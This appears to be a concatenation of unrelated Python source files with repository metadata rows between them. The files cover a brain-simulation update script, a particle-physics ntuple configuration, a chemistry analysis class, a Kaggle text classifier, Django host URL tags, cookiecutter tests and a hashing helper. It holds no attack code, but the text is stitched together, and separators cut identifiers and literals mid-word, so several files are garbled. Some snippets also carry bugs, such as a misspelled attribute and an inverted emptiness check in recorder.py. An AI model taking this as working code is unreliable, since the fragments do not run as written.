#
# TheVirtualBrain-Framework Package. This package holds all Data Management, and
# Web-UI helpful to run brain-simulations. To use it, you also need do download
# TheVirtualBrain-Scientific Package (for simulators). See content of the
# documentation-folder for more details. See also http://www.thevirtualbrain.org
#
# (c) 2012-2013, Baycrest Centre for Geriatric Care ("Baycrest")
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2 as published by the Free
# Software Foundation. This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details. You should have received a copy of the GNU General
# Public License along with this program; if not, you can download it here
# http://www.gnu.org/licenses/old-licenses/gpl-2.0
#
#
# CITATION:
# When using The Virtual Brain for scientific publications, please cite it as follows:
#
# Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide,
# Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013)
# The Virtual Brain: a simulator of primate bra
|
in network dynamics.
# Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010)
#
#
"""
.. moduleauthor:: Bogdan Neacsa <bogdan.neacsa@codem
|
art.ro>
"""
from tvb.basic.logger.builder import get_logger
from tvb.core.entities.storage import dao
from tvb.core.services.event_handlers import handle_event
LOGGER = get_logger(__name__)
PAGE_SIZE = 20
EVENT_FILE_IDENTIFIER = "CodeVersionsManager.update.4750"
def update():
"""
Update TVB code to SVN revision version 4770.
This update was done for release 1.0.5
"""
projects_count = dao.get_all_projects(is_count=True)
for page_start in range(0, projects_count, PAGE_SIZE):
projects_page = dao.get_all_projects(page_start=page_start,
page_end=min(page_start + PAGE_SIZE, projects_count))
for project in projects_page:
try:
handle_event(EVENT_FILE_IDENTIFIER, dao.get_system_user(), project)
except Exception, excep:
LOGGER.exception(excep)
|
Williams224/davinci-scripts
|
ksteta3pi/NTupleMaker_MagDown.py
|
Python
|
mit
| 17,928
| 0.01863
|
from Gaudi.Configuration import *
from Configurables import DaVinci
#from Configurables import AlgTool
from Configurables import GaudiSequencer
MySequencer = GaudiSequencer('Sequence')
#For 2012 MC
DaVinci.DDDBtag='dddb-20130929-1'
DaVinci.CondDBtag='sim-20130522-1-vc-md100'
#for 2011 MC
#DaVinci.DDDBtag='dddb-20130929'
#DaVinci.CondDBtag='sim-20130522-vc-mu100'
simulation=True
#################################################################
#Rerun with stripping21 applied
if simulation:
from Configurables import EventNodeKiller
from StrippingConf.Configuration import StrippingConf, StrippingStream
from StrippingSettings.Utils import strippingConfiguration
from StrippingArchive.Utils import buildStreams
from StrippingArchive import strippingArchive
event_node_killer=EventNodeKiller('StripKiller')
event_node_killer.Nodes=['Event/AllStreams','/Event/Strip']
from Configurables import PhysConf
PhysConf().CaloReProcessing=True
stripping="stripping21"
config=strippingConfiguration(stripping)
archive=strippingArchive(stripping)
streams=buildStreams(stripping=config,archive=archive)
MyStream= StrippingStream("MyStream")
MyLines= ["StrippingB2XEtaB2eta3piKstarLin
|
e"]
for stream in streams:
for line in stream.lines:
if line.name() in MyLines:
MyStream.appendLines( [ line ])
from Configurables import ProcStatusCheck
filterBadEvents=ProcStatusCheck()
sc=StrippingConf( Streams= [ MyStream ],
MaxCandidates = 2000,
AcceptBadEvents = F
|
alse,
BadEventSelection = filterBadEvents)
DaVinci().appendToMainSequence([event_node_killer,sc.sequence()])
##################Creating NTuples#####################################
from Configurables import DecayTreeTuple
from Configurables import TupleToolL0Calo
from DecayTreeTuple.Configuration import *
line = 'B2XEtaB2eta3piKstarLine'
tuple=DecayTreeTuple()
tuple.Decay="[B0 -> ^(K*(892)0 -> ^K+ ^pi-) ^(eta -> ^pi- ^pi+ ^(pi0 -> ^gamma ^gamma))]CC"
tuple.Branches={"B0":"[B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))]CC"}
tuple.Inputs=['/Event/Phys/{0}/Particles'.format(line)]
tuple.addTool(TupleToolL0Calo())
tuple.TupleToolL0Calo.TriggerClusterLocation="/Event/Trig/L0/Calo"
tuple.TupleToolL0Calo.WhichCalo="HCAL"
tuple.ToolList += [
"TupleToolGeometry"
, "TupleToolDira"
, "TupleToolAngles"
# , "TupleToolL0Calo"
, "TupleToolPid"
, "TupleToolKinematic"
, "TupleToolPropertime"
, "TupleToolPrimaries"
, "TupleToolEventInfo"
, "TupleToolTrackInfo"
, "TupleToolVtxIsoln"
, "TupleToolPhotonInfo"
, "TupleToolMCBackgroundInfo"
, "TupleToolCaloHypo"
, "TupleToolTrackIsolation"
, "TupleToolPi0Info"
]
tuple.addTool(TupleToolDecay,name="B0")
from Configurables import TupleToolDecayTreeFitter
#========================================REFIT WITH DAUGHTERS AND PV CONSTRAINED==============================
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/ConsAll')
tuple.B0.ConsAll.Verbose=True
tuple.B0.ConsAll.constrainToOriginVertex=True
tuple.B0.ConsAll.daughtersToConstrain = ["K*(892)0","eta"]
#==============================REFIT WITH ETA, PI0 AND PV CONTRAINED==============================
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpf')
tuple.B0.PVFitpf.Verbose=True
tuple.B0.PVFitpf.constrainToOriginVertex=True
tuple.B0.PVFitpf.daughtersToConstrain = ["eta","pi0"]
#==============================REFIT WITH ONLY ETA AND PV CONSTRAINED==========================
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFit')
tuple.B0.PVFit.Verbose=True
tuple.B0.PVFit.constrainToOriginVertex=True
tuple.B0.PVFit.daughtersToConstrain = ["eta"]
#==============================REFIT WITH ETA AND PV K for piCONTRAINED==============================
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitKforpi')
tuple.B0.PVFitKforpi.Verbose=True
tuple.B0.PVFitKforpi.constrainToOriginVertex=True
tuple.B0.PVFitKforpi.daughtersToConstrain = ["eta"]
tuple.B0.PVFitKforpi.Substitutions={
"B0 -> (K*(892)0 -> ^K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "pi+" ,
"B~0 -> (K*(892)~0 -> ^K- pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "pi-" ,
}
#==============================REFIT WITH ETA AND PV CONTRAINED - piminus ->K swap ==============
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminusforK')
tuple.B0.PVFitpiminusforK.Verbose=True
tuple.B0.PVFitpiminusforK.constrainToOriginVertex=True
tuple.B0.PVFitpiminusforK.daughtersToConstrain = ["eta"]
tuple.B0.PVFitpiminusforK.Substitutions={
"B0 -> (K*(892)0 -> K+ ^pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "K-" ,
"B~0 -> (K*(892)~0 -> K- ^pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "K+" ,
}
#==============================REFIT WITH ETA AND PV CONTRAINED - piminus0 -> Kminus swap =============
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminus0forK')
tuple.B0.PVFitpiminus0forK.Verbose=True
tuple.B0.PVFitpiminus0forK.constrainToOriginVertex=True
tuple.B0.PVFitpiminus0forK.daughtersToConstrain = ["eta"]
tuple.B0.PVFitpiminus0forK.Substitutions={
"B0 -> (K*(892)0 -> K+ pi-) (eta -> ^pi- pi+ (pi0 -> gamma gamma))" : "K-" ,
"B~0 -> (K*(892)~0 -> K- pi+) (eta -> ^pi+ pi- (pi0 -> gamma gamma))" : "K+" ,
}
#==============================REFIT WITH ETA AND PV CONTRAINED - piplus -> Kminus swap ============
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiplusforK')
tuple.B0.PVFitpiplusforK.Verbose=True
tuple.B0.PVFitpiplusforK.constrainToOriginVertex=True
tuple.B0.PVFitpiplusforK.daughtersToConstrain = ["eta"]
tuple.B0.PVFitpiplusforK.Substitutions={
"B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- ^pi+ (pi0 -> gamma gamma))" : "K+" ,
"B~0 -> (K*(892)~0 -> K- pi+) (eta -> pi+ ^pi- (pi0 -> gamma gamma))" : "K-" ,
}
#proton swaps
#==============================REFIT WITH ETA AND PV K for proton CONTRAINED==============================
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitKforproton')
tuple.B0.PVFitKforproton.Verbose=True
tuple.B0.PVFitKforproton.constrainToOriginVertex=True
tuple.B0.PVFitKforproton.daughtersToConstrain = ["eta"]
tuple.B0.PVFitKforproton.Substitutions={
"B0 -> (K*(892)0 -> ^K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "p+" ,
"B~0 -> (K*(892)~0 -> ^K- pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "p~-" ,
}
#==============================REFIT WITH ETA AND PV CONTRAINED - piminus ->K swap ==============
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminusforproton')
tuple.B0.PVFitpiminusforproton.Verbose=True
tuple.B0.PVFitpiminusforproton.constrainToOriginVertex=True
tuple.B0.PVFitpiminusforproton.daughtersToConstrain = ["eta"]
tuple.B0.PVFitpiminusforproton.Substitutions={
"B0 -> (K*(892)0 -> K+ ^pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "p~-" ,
"B~0 -> (K*(892)~0 -> K- ^pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "p+" ,
}
#==============================REFIT WITH ETA AND PV CONTRAINED - piminus0 -> Kminus swap =============
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminus0forproton')
tuple.B0.PVFitpiminus0forproton.Verbose=True
tuple.B0.PVFitpiminus0forproton.constrainToOriginVertex=True
tuple.B0.PVFitpiminus0forproton.daughtersToConstrain = ["eta"]
tuple.B0.PVFitpiminus0forproton.Substitutions={
"B0 -> (K*(892)0 -> K+ pi-) (eta -> ^pi- pi+ (pi0 -> gamma gamma))" : "p~-" ,
"B~0 -> (K*(892)~0 -> K- pi+) (eta -> ^pi+ pi- (pi0 -> gamma gamma))" : "p+" ,
}
#==============================REFIT WITH ETA AND PV CONTRAINED - piplus -> Kminus swap ============
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiplusforproton')
tuple.B0.PVFitpiplusforproton.Verbose=True
tuple.B0.PVFitpiplusforproton.constrainToOriginVertex=True
tuple.B0.PVFitpiplusforproton.daughtersToConstrain = ["eta"]
tuple.B0.PVFitpiplusforproton.Substitutions={
"B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- ^pi+ (pi0 -> gamma gamma))" : "p+" ,
"B~0 -> (K*(892)~0 -> K- pi+) (eta -> pi+ ^pi- (pi0 -> gamma gamma))" : "p~-" ,
}
#==============================REFI
|
chrisjsewell/PyGauss
|
pygauss/analysis.py
|
Python
|
gpl-3.0
| 44,913
| 0.00993
|
# -*- coding: utf-8 -*-
from itertools import product, imap
import copy
import math
import string
import multiprocessing
import platform
import numpy as np
import pandas as pd
from pandas.tools.plotting import radviz
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib.colors import ColorConverter
from sklearn.cluster import KMeans
from IPython.core.display import clear_output
from .molecule import Molecule
from .utils import df_to_img
from .file_io import Folder
def unpack_and_make_molecule(val_dict):
if val_dict.has_key('args'):
args = val_dict.pop('args')
else:
args = []
return Molecule(*args, **val_dict)
class Analysis(object):
"""a class to analyse multiple computations """
def __init__(self, folderpath='', server=None, username=None, passwrd=None,
folder_obj=None, headers=[]):
"""a class to analyse multiple computations
Parameters
----------
folderpath : str
the folder directory storing the files to be analysed
server : str
the name of the server storing the files to be analysed
username : str
the username to connect to the server
passwrd : str
server password, if not present it will be asked for during initialisation
headers : list
the variable categories for each computation
"""
self._folder = None
if folder_obj:
self._folder = folder_obj
elif folderpath or server:
self.set_folder(folderpath, server, username, passwrd)
heads = headers[:]+['Molecule']
self._df = pd.DataFrame(columns=heads)
self._df.index.name = 'ID'
self._next_index = 0
def __repr__(self):
return self.get_table().to_string()
def copy(self):
clone = copy.deepcopy(self)
return clone
def get_folder(self):
return self._folder
def set_folder(self, folderpath='', server=None,
username=None, passwrd=None):
self._folder = Folder(folderpath, server, username, passwrd)
folder = property(get_folder, set_folder,
doc="The folder for gaussian runs")
def count_runs(self):
""" get number of runs held in analysis """
return len(self._df.index)
def _add_molecule(self, molecule, identifiers):
"""add molecule to internal dataframe """
identifiers['Molecule'] = molecule
series = pd.DataFrame(identifiers,
index=[self._next_index])
self._df = self._df.copy().append(series)
self._next_index += 1
return True
def add_run(self, identifiers={},
init_fname=None, opt_fname=None,
freq_fname=None, nbo_fname=None,
alignto=[], atom_groups={},
add_if_error=False, folder_obj=None):
"""add single Gaussian run input/outputs """
if not folder_obj:
folder_obj = self._folder
molecule = Molecule(init_fname=init_fname,
opt_fname=opt_fname,
freq_fname=freq_fname,
nbo_fname=nbo_fname,
folder_obj=folder_obj,
alignto=alignto, atom_groups=atom_groups,
fail_silently=True)
num_files = filter(lambda x:x, [init_fname, opt_fname,
freq_fname, nbo_fname])
read_errors = molecule.get_init_read_errors()
if len(read_errors) != num_files and (not read_errors or add_if_error):
self._add_molecule(molecule, identifiers)
return molecule.get_init_read_errors()
def _get_molecules(self, mol_inputs, folder_obj, identifiers, ipython_print=False):
""" get molecules """
if folder_obj.islocal() and not platform.system() == 'Windows':
pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())
mapping = pool.imap
else:
mapping = imap
with folder_obj:
molecules=[]
all_read_errors = []
for molecule in mapping(unpack_and_make_molecule, mol_inputs):
molecules.append(molecule)
read_errors = []
for typ, fname, msg in molecule.get_init_read_errors():
idents = identifiers[len(molecules)-1].copy()
idents.pop('Molecule', '_')
idents['Type'] = typ
idents['File'] = fname
idents['Error_Message'] = msg
read_errors.append(idents)
all_read_errors.append(read_errors)
if ipython_print:
print 'Reading data {0} of {1}'.format(len(molecules),
len(mol_inputs))
try:
clear_output(wait=True)
except:
pass
if folder_obj.islocal() and not platform.system() == 'Windows':
pool.close()
pool.join()
return molecules, all_read_errors
def add_runs(self, headers=[], values=[],
init_pattern=None, opt_pattern=None,
freq_pattern=None, nbo_pattern=None,
add_if_error=False,
alignto=[], atom_groups={},
ipython_print=False, folder_obj=None):
"""add multiple Gaussian run inputs/outputs """
# set folder oject
if not folder_obj:
folder_obj = self._folder
#get variables for each run
mol_inputs = []
identifiers = []
for idents in product(*values):
mol_input = {}
identifiers.append(dict(zip(headers, idents)))
mol_input['init_fname'] = init_pattern.format(*idents) if init_pattern else None
if type(opt_pattern) is str:
mol_input['opt_fname'] = opt_pattern.format(*idents) if opt_pattern else None
elif type(opt_pattern) is list or type(opt_pattern) is tuple:
mol_input['opt_fname'] = [o.format(*idents) for o in opt_pattern]
else:
mol_input['opt_fname'] = None
mol_input['freq_fname'] = freq_pattern.format(*idents) if freq_pattern else None
mol_input['nbo_fname'] = nbo_pattern.format(*idents) if nbo_pattern else None
mol_input['folder_obj'] = folder_obj
mol_input['alignto'] = alignto
mol_input['atom_groups'] = atom_groups
mol_input['fail_silently'] = True
mol_inputs.append(mol_input)
#create the molecules
molecules, read_errors = self._get_molecules(mol_inputs, folder_obj,
|
ide
|
ntifiers, ipython_print)
#add the molecules to the internal table
for molecule, idents, inputs, read_error in zip(molecules, identifiers,
mol_inputs, read_errors):
num_files = filter(lambda x:x, [inputs['init_fname'], inputs['opt_fname'],
inputs['freq_fname'], inputs['nbo_fname']])
if read_error != num_files and (not read_error or add_if_error):
self._add_molecule(molecule, idents)
#collate read errors into a dataframe to return
read_errors = filter(len, read_errors)
err_df = pd.DataFrame([item for sublist in read_errors for item in sublist])
if read_errors:
|
sadahanu/DataScience_SideProject
|
Stack_Exchange/py2_text.py
|
Python
|
mit
| 7,689
| 0.017167
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 13 23:10:40 2016
@author: zhouyu
"""
#%%
import pandas as pd
import numpy as np
import os
import re
import nltk
from nltk.corpus import stopwords
from bs4 import BeautifulSoup
os.chdir('/Users/zhouyu/Documents/Zhou_Yu/DS/kaggle_challenge/text processing')
#%% step1: import data
import glob
alltrainfiles = glob.glob("*.csv")
raw_text =pd.concat((pd.read_csv(f,index_col = None, header =0) for f in alltrainfiles),ignore_index = True)
#raw_text = pd.read_csv("crypto.csv",index_col = None)
#%% step2: clean data, remove HTML, symbols and stopwords
def text_to_words(rawtext):
#split into individual words, remove HTML, only keep letters and number
# convert letters to lower case
reg_c = re.compile('[^a-zA-Z0-9_\\+\\-]')
words = [word for word in reg_c.split(rawtext.lower()) if word!='']
stops = set(stopwords.words("english"))
#take out stop words
meaningful_words = [w for w in words if not w in stops]
return(" ".join(meaningful_words))
def target_to_words(rawtext):
#only return the first target word
reg_c = re.compile('[^a-zA-Z0-9_\\+\\-]')
words = [word for word in reg_c.split(rawtext.lower()) if word!='']
stops = set(stopwords.words("english"))
#take out stop words
meaningful_words = [w for w in words if not w in stops]
return(meaningful_words[0])
#%%
cleaned_post = []
cleaned_target = []
sz = raw_text.shape[0]
for i in range(0,sz):
raw_post = raw_text['title'][i]+' '+raw_text['content'][i]
raw_post = BeautifulSoup(raw_post).get_text()
cleaned_post.append(text_to_words(raw_post))
cleaned_target.append(target_to_words(raw_text['tags'][i]))
if((i+1)%1000==0):
print "Cleanning %d of %d\n" % (i+1,sz)
#print cleaned_post[1]
#%% step3: creating features from a bag of words
from sklearn.feature_extraction.text import CountVectorizer
count_vect = CountVectorizer(analyzer = "word", \
tokenizer = None, \
preprocessor = None, \
stop_words = None, \
max_features = 5000)
X_train_counts = count_vect.fit_transform(cleaned_post)
#X_target_counts = count_vect.fit_transform(cleaned_target)
from sklearn.feature_extraction.text import TfidfTransformer
t
|
f_transformer = TfidfTransformer(use_idf = False).fit(X_train_counts)
X_train_tf = tf_transformer.transform(X_train_counts)
#%% training a linear model
# METHOD 1: BUILD randomforestclassifier...
from sklearn.ensemble import RandomForestClassifier
rf = RandomForestClassifier(n_estimators = 10)
forest = rf.fit(X_train_tf, cleaned_target)
#%% examine the result produced by METHOD 1:
pred = rf.predict(
|
X_train_tf)
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from collections import OrderedDict
import matplotlib.pyplot as plt
import itertools
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, cm[i, j],
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
cnf_matrix = confusion_matrix(cleaned_target,pred)
#target_names = set(cleaned_target)
#np.set_printoptions(precision = 2)
#plt.figure()
#plot_confusion_matrix(cnf_matrix,classes = target_names,normalize = True,title='Normalized confusion matrix')
#plt.show()
target_names = list(OrderedDict.fromkeys(cleaned_target))
print(classification_report(cleaned_target,pred,target_names = target_names))
#######
#%% Method 2: directly predicted as the highest frequency element
# find the highest tf-idf
#step1: select a random sample
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from collections import OrderedDict
sample = np.random.choice(87000,1000,replace = False)
tf_pred = []
tf_target = []
for i in range(0,1000):
r = sample[i];
tf_target.append(cleaned_target[r])
tf_post = X_train_tf.getrow(r).toarray()
tf_post_max = tf_post.argmax()
tf_pred.append(count_vect.get_feature_names()[tf_post_max])
tf_cnf_matrix = confusion_matrix(tf_target,tf_pred)
target_names = list(OrderedDict.fromkeys(tf_pred+tf_target))
print(classification_report(tf_target, tf_pred,target_names =target_names))
#%% evaluate test set
test = pd.read_csv('test/test.csv')
cleaned_test = []
test_sz = test.shape[0]
for i in range(0,test_sz):
test_post = test['title'][i]+' '+test['content'][i]
test_post = BeautifulSoup(test_post).get_text()
cleaned_test.append(text_to_words(test_post))
if((i+1)%1000==0):
print "Cleanning %d of %d\n" % (i+1,test_sz)
#%% use random forest
X_test_counts = count_vect.fit_transform(cleaned_test)
X_test_tf = tf_transformer.transform(X_test_counts)
result = forest.predict(X_test_counts)
# use max tf-idf
#%%
test_pred = []
for i in range(0,test_sz):
tf_test = X_test_tf.getrow(i).toarray()
# just return one tag
#tf_test_max = tf_test.argmax()
#test_pred.append(count_vect.get_feature_names()[tf_test_max])
ind = np.argpartition(tf_test,-4)[:,-4:]
pred_tags = [count_vect.get_feature_names()[j] for j in ind[0,:].tolist()]
test_pred.append( " ".join(pred_tags))
if((i+1)%1000==0):
print "Predicting %d of %d\n" % (i+1,test_sz)
result = test_pred
#%% prepare submission
submission = pd.read_csv('test/sample_submission.csv')
submission.iloc[:,1] = result
submission.to_csv('test/submission.csv',index = None)
#%% try to use NMF model can not be mapped to specific question...
n_features = 5000
n_topics = 10
n_samples = test_sz
n_top_words = 4
def get_top_words(model, feature_names, n_top_words):
res = []
for topic_idx, topic in enumerate(model.components_):
tags = " ".join([feature_names[i]
for i in topic.argsort()[:-n_top_words - 1:-1]])
res.append(tags)
return res
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.decomposition import NMF
from time import time
tfidf_vectorizer = TfidfVectorizer(max_df=0.95, min_df=2,
max_features=n_features,
stop_words='english')
tfidf = tfidf_vectorizer.fit_transform(cleaned_test)
# Fit the NMF model
print("Fitting the NMF model (Frobenius norm) with tf-idf features, "
"n_samples=%d and n_features=%d..."
% (n_samples, n_features))
t0 = time()
nmf = NMF(n_components=n_topics, random_state=1,
alpha=.1, l1_ratio=.5).fit(tfidf)
print("done in %0.3fs." % (time() - t0))
print("\nTopics in NMF model (Frobenius norm):")
tfidf_feature_names = tfidf_vectorizer.get_feature_names()
#print_top_words(nmf, tfidf_feature_names, n_top_words)
result = get_top_words(nmf,tfidf_feature_names,n_top_words)
|
detman/stomplooper
|
recorder.py
|
Python
|
gpl-3.0
| 646
| 0.010836
|
#!/usr/bin/python
import time
class Recorder(object):
debug = 0
def __init__(self):
self.recordings = []
self.lastRecord = 0
if Recorder.debug:
print("init Recorder")
def record(self):
now = time.time();
if self.lastRecord != 0:
sel
|
f.recordings.append(now-self.lastRecord)
if Recorder.debug:
print(len(self.recordings), " ", self.recordings[-1]);
self.lastRecord = now
def empty(self):
return len(self.recordings) > 0
def minInterval(self):
return 0 if len(self.recording) == 0 else self.re
|
cording[0]
|
jezdez/django-hosts
|
django_hosts/templatetags/hosts.py
|
Python
|
bsd-3-clause
| 5,070
| 0
|
import re
from django import template
from django.conf import settings
from django.template import TemplateSyntaxError
from django.template.base import FilterExpression
from django.template.defaulttags import URLNode
from django.utils.encoding import iri_to_uri, smart_str
from django.urls import set_urlconf, get_urlconf
from ..resolvers import reverse_host, get_host
from ..utils import normalize_scheme, normalize_port
register = template.Library()
kw
|
arg_re = re.compile(r"(?:(\w+)=)?(.
|
+)")
class HostURLNode(URLNode):
def __init__(self, *args, **kwargs):
self.host = kwargs.pop('host')
self.host_args = kwargs.pop('host_args')
self.host_kwargs = kwargs.pop('host_kwargs')
self.scheme = kwargs.pop('scheme')
self.port = kwargs.pop('port')
super(HostURLNode, self).__init__(*args, **kwargs)
def maybe_resolve(self, var, context):
"""
Variable may have already been resolved
in e.g. a LoopNode, so we only resolve()
if needed.
"""
if isinstance(var, FilterExpression):
return var.resolve(context)
return var
def render(self, context):
host = get_host(self.maybe_resolve(self.host, context))
current_urlconf = get_urlconf()
try:
set_urlconf(host.urlconf)
path = super(HostURLNode, self).render(context)
if self.asvar:
path = context[self.asvar]
finally:
set_urlconf(current_urlconf)
host_args = [self.maybe_resolve(x, context) for x in self.host_args]
host_kwargs = dict((smart_str(k, 'ascii'),
self.maybe_resolve(v, context))
for k, v in self.host_kwargs.items())
if self.scheme:
scheme = normalize_scheme(self.maybe_resolve(self.scheme, context))
else:
scheme = host.scheme
if self.port:
port = normalize_port(self.maybe_resolve(self.port, context))
else:
port = host.port
hostname = reverse_host(host, args=host_args, kwargs=host_kwargs)
uri = iri_to_uri('%s%s%s%s' % (scheme, hostname, port, path))
if self.asvar:
context[self.asvar] = uri
return ''
else:
return uri
def parse_params(name, parser, bits):
args = []
kwargs = {}
for bit in bits:
match = kwarg_re.match(bit)
if not match:
raise TemplateSyntaxError("Malformed arguments to %s tag" % name)
name, value = match.groups()
if name:
kwargs[name] = parser.compile_filter(value)
else:
args.append(parser.compile_filter(value))
return args, kwargs
def fetch_arg(name, arg, bits, consume=True):
try:
pivot = bits.index(arg)
try:
value = bits[pivot + 1]
except IndexError:
raise TemplateSyntaxError("'%s' arguments must include "
"a variable name after '%s'" %
(name, arg))
else:
if consume:
del bits[pivot:pivot + 2]
return value, pivot, bits
except ValueError:
return None, None, bits
@register.tag
def host_url(parser, token):
"""
Simple tag to reverse the URL inclusing a host.
{% host_url 'view-name' host 'host-name' %}
{% host_url 'view-name' host 'host-name' 'spam' %}
{% host_url 'view-name' host 'host-name' scheme 'https' %}
{% host_url 'view-name' host 'host-name' as url_on_host_variable %}
{% host_url 'view-name' varg1=vvalue1 host 'host-name' 'spam' 'hvalue1' %}
{% host_url 'view-name' vvalue2 host 'host-name' 'spam' harg2=hvalue2 %}
"""
bits = token.split_contents()
name = bits[0]
if len(bits) < 2:
raise TemplateSyntaxError("'%s' takes at least one argument"
" (path to a view)" % name)
view_name = parser.compile_filter(bits[1])
asvar, pivot, bits = fetch_arg(name, 'as', bits[1:]) # Strip off viewname
scheme, pivot, bits = fetch_arg(name, 'scheme', bits)
if scheme:
scheme = parser.compile_filter(scheme)
port, pivot, bits = fetch_arg(name, 'port', bits)
if port:
port = parser.compile_filter(port)
host, pivot, bits = fetch_arg(name, 'host', bits, consume=False)
if host:
host = parser.compile_filter(host)
view_args, view_kwargs = parse_params(name, parser, bits[1:pivot])
host_args, host_kwargs = parse_params(name, parser, bits[pivot + 2:])
else:
# No host was given so use the default host
host = settings.DEFAULT_HOST
view_args, view_kwargs = parse_params(name, parser, bits[1:])
host_args, host_kwargs = (), {}
return HostURLNode(view_name=view_name, args=view_args, kwargs=view_kwargs,
asvar=asvar, host=host, host_args=host_args,
host_kwargs=host_kwargs, scheme=scheme, port=port)
|
luzfcb/cookiecutter
|
tests/replay/test_replay.py
|
Python
|
bsd-3-clause
| 2,207
| 0
|
# -*- coding: utf-8 -*-
"""test_replay."""
import os
import pytest
from cookiecutter import replay, main, exceptions
def test_get_replay_file_name():
"""Make sure that replay.get_file_name generates a valid json file path."""
exp_replay_file_name = os.path.join('foo', 'bar.json')
assert replay.get_file_name('foo', 'bar') == exp_replay_file_name
@pytest.mark.parametrize(
'invalid_kwargs', ({'no_input': True},
{'extra_context': {}},
{'no_input': True, 'extra_context': {}},)
)
def test_raise_on_invalid_mode(invalid_kwargs):
"""Test `cookiecutter` raise exception on unacceptable `replay` request."""
with pytest.raises(exceptions.InvalidModeException):
main.cookiecutter('foo', replay=True, **invalid_kwargs)
def test_main_does_not_invoke_dump_but_load(mocker):
"""Test `cookiecutter` calling correct functions o
|
n `replay`."""
mock_
|
prompt = mocker.patch('cookiecutter.main.prompt_for_config')
mock_gen_context = mocker.patch('cookiecutter.main.generate_context')
mock_gen_files = mocker.patch('cookiecutter.main.generate_files')
mock_replay_dump = mocker.patch('cookiecutter.main.dump')
mock_replay_load = mocker.patch('cookiecutter.main.load')
main.cookiecutter('tests/fake-repo-tmpl/', replay=True)
assert not mock_prompt.called
assert not mock_gen_context.called
assert not mock_replay_dump.called
assert mock_replay_load.called
assert mock_gen_files.called
def test_main_does_not_invoke_load_but_dump(mocker):
"""Test `cookiecutter` calling correct functions on non-replay launch."""
mock_prompt = mocker.patch('cookiecutter.main.prompt_for_config')
mock_gen_context = mocker.patch('cookiecutter.main.generate_context')
mock_gen_files = mocker.patch('cookiecutter.main.generate_files')
mock_replay_dump = mocker.patch('cookiecutter.main.dump')
mock_replay_load = mocker.patch('cookiecutter.main.load')
main.cookiecutter('tests/fake-repo-tmpl/', replay=False)
assert mock_prompt.called
assert mock_gen_context.called
assert mock_replay_dump.called
assert not mock_replay_load.called
assert mock_gen_files.called
|
a5kin/hecate
|
examples/__init__.py
|
Python
|
mit
| 107
| 0
|
"""
A colle
|
ction of Xentica models and experiments.
Indende
|
d to illustrate how to use the framework.
"""
|
tykkz/hasherapp
|
algorithm.py
|
Python
|
mit
| 1,194
| 0.002513
|
import hashlib
def
|
hash_list():
return str(hashlib.algorithms_guaranteed)
def hash_text(algorithm_array, text, pass_count):
result_dict = {}
# Type checking
if type(pass_count) is not int:
return [False, {"error": "Pass count should be of 'integer' type."}]
elif type(text) is not str:
return [False, {"error": "Text should be of 'string' type."}]
elif type(algorithm_array) is not list:
return [False, {"error": "Algorithm
|
list should be of 'list' type."}]
# Bounds checking
avail_alg_set = set(algorithm_array) & set(hashlib.algorithms_guaranteed)
if pass_count > 1000000 or pass_count <= 0:
return [False, {"error": "Pass count should be larger than 0 and smaller than 1000000."}]
elif len(avail_alg_set) == 0:
return [False, {"error": "None of these hash algorithms are available."}]
# There is no error case; do the hash computations for every function
for function in avail_alg_set:
hash_val = text
for _ in range(pass_count):
hash_val = getattr(hashlib, function)(hash_val.encode()).hexdigest()
result_dict[function] = hash_val
return [True, result_dict]
|
ONLYOFFICE/core
|
Test/Applications/StandardTester/tester/scripts/generate.py
|
Python
|
agpl-3.0
| 134
| 0.014925
|
#!
|
/usr/bin/env python
import tester
